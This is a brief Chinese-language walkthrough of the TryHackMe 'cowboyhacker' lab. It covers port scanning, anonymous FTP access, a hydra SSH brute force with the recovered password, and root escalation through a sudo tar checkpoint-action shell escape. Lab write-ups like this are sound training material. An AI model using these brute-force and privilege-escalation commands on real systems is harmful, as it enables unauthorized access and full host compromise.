URL : https://tryhackme.com/room/cowboyhacker

IP : 10.10.164.54

Recon

  • 掃 Portrustscan -a 10.10.164.54 -r 1-65535
  • 21
  • 22
  • 80nmap -A -p21,22,80 10.10.164.54-
  • FTP 可以匿名登入 !!觀察首頁-
  • 沒啥東東dirsearch- 也沒啥東東

FTP Anonymous login

  • FTP 登入
  • 裡面有兩ㄍ檔案都載下來FTP 檔案- 作者是 lin- 看起來是一個密碼表

爆破密碼

  • hydra -l 'lin' -P locks.txt ssh://10.10.164.54
  • 帳號 : lin
  • 密碼 : RedDr4gonSynd1cat3SSH 登入成功- 取得 user flag-

提權

  • 起手式 sudo -l
  • 發現可以用 sudo tarGTFOBins 尋找 tar sudo 提權- https://gtfobins.github.io/gtfobins/tar/#sudo
  • sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh提權完畢,取得 root flag-